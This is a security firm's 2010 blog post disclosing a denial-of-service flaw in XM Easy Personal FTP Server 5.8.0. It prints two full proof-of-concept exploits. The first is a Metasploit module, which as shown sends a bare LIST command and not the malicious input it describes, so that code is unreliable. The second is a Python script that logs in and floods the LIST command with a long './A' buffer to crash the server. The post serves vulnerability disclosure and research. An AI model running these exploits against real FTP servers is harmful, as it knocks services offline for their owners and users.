RedTeam Labs

Information Security Vulnerablities, Exploit Code and News

CATEGORIES:      Company News General Industry News Research List View

RedTeam Discovers 0-day in XM FTP Server

Category: Research Tags: xm easy ftp denial of service dos
Posted by: labs@redteamsecure.com (Jeremiah Talamantes) on 2010-04-19 19:55:19

DOS Vulnerability in XM Easy FTP Server 5.8.0

RedTeam Security Labs security researcher and principal consultant, Jeremiah Talamantes, has uncovered a security vulnerability in XM Easy FTP server version 5.8.0. The security vulnerability in the FTP server application revolves around mishandling of input within the LIST FTP command. An attacker can execute a Denial-of-Service attack on the XM FTP server application by sending a string of malicious characters to the LIST command causing the program to crash.

Jeremiah has developed proof-of-concept code for this vulnerability for the Metasploit Framework as well as in the Python programming language. The Metasploit proof-of-concept code has been published by the Exploit Database and Packet Storm Security and can be viewed on their sites.


Our Published Exploit:
* Packet Storm Security
* The Exploit Database


Proof-of-concept code for Metasploit



# Exploit Title: XM Easy Personal FTP Server LIST DoS (Meta)

# Date: 4/17/2010

# Author: Jeremiah Talamantes

# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe

# Version: 5.8.0

# Tested on: Windows XP, SP2

# CVE : N/A

# Code : 



##

# This file is part of the Metasploit Framework and may be subject to 

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/ 

##



##

# xmeasy580_list.rb

#

# XM Easy Personal FTP Server 5.8.0 LIST DoS

#

# Tested on: Windows XP, SP2 (EN)

#

# Date tested: 4/17/2010

#

# First you must login to the FTP server in order to execute the DoS

# attack. This module exploits a weakness in the LIST command.

#

# Discovered by: Jeremiah Talamantes

# RedTeam Security

# http://www.redteamsecure.com

##



require 'msf/core'



class Metasploit3 < Msf::Auxiliary



	include Msf::Exploit::Remote::Ftp

	include Msf::Auxiliary::Dos

	

	def initialize(info = {})

		super(update_info(info,	

			'Name'           => 'XM Easy Personal FTP Server 5.8.0 LIST DoS',

			'Description'    => %q{

				This module exploits a DoS vulnerability in the LIST command

				in XM Easy Personal FTP Server 5.8.0. In order to execute this

				exploit, you must first login to the FTP server. This was only

				tested on Windows XP, SP2 (EN).

			},

			'Author'         => 'Jeremiah Talamantes (RedTeam Security)',

			'License'        => MSF_LICENSE,

			'Version'        => '$Revision: 1234 $',

			'References'     => [

				[ 'URL', 'None' ]

			],

			'DisclosureDate' => 'Apr 17 2010')

		)



		# Required settings

		register_options([

			OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),

			OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])

		])

	end



	def run

		return unless connect_login



		raw_send("LIST \r\n")

		

		disconnect



		print_status("Check to see if the server is responding...")

	end

end
Proof-of-concept code for Python 
# Exploit Title: XM Easy Personal FTP Server LIST DoS
# Date: 4/17/2010
# Author: Jeremiah Talamantes
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP, SP2
# CVE : N/A

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##                 XM Easy Personal FTP Server                 ##"
print "##                        Version 5.8.0                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Define the exploit's usage
def Usage():
    print ("Usage: xmexploit.py   \n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security, LLC : www.redteamsecure.com/labs\n")

# Buffer settings. Change as necessary
buffer= "./A" * 20000

def start(hostname, username, password):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Error: unable to connect to host")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    #Send username to server
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    # Send password to server
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    print "Sending the malicious chars..."
    # Send data to server
    sock.send("list %s\r\n" %buffer)
    sock.close()

if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    start(hostname,username,password)
    sys.exit(0)

# End



Share |



Follow Our Twitter

Follow Our RSS

Share this: |


Categories



DISCLAIMER
    The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.


Contact Us

Phone number:
1-612-234-7848

E-mail:

info@redteamsecure.com